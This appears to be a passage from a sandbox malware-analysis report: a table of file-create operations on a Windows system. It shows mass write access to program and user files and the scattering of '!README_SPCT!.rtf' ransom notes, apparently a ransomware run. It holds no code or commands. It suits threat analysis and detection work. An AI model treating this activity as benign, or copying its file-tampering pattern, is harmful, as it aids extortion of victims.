| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\sZCaoKy22\d8XRldYjtyAJ65cTL\39 lIO36wrCemj.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\COPYRIGHT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\sRGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\invalid32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr\default.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\zipfs.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_pt_BR.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\snmp.acl.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr\profile.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunpkcs11.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklisted.certs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\cursors.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunmscapi.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\LICENSE | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jce.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management-agent.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\logging.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\psfontj2d.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklist | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\tzmappings | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Journal.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Windows Journal\Templates\Seyes.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Multimedia Platform\separate.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jvm.hprof.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\US_export_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\psfont.properties.ja | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\local_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\se-viii.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\Journal.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Graph.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\recorder.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\Welcome.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Adobe.Reader.Dependencies.manifest | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Genko_2.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\en-US\WinMail.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\ImagingDevices.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\license.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\java.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\release | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\server\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\amd64\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\blank.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\To_Do_List.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_Full.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\PZX9kMdC\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\smgUvqd\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\sZCaoKy22\d8XRldYjtyAJ65cTL\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\sZCaoKy22\d8XRldYjtyAJ65cTL\CZHeADoWE59gR4Sui-\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\net.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Music.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\WinMail.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\java.security | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\cacerts | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\README.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\PDIALOG.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Shorthand.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\dir.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Measure.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\javaws.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\MoreTools.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
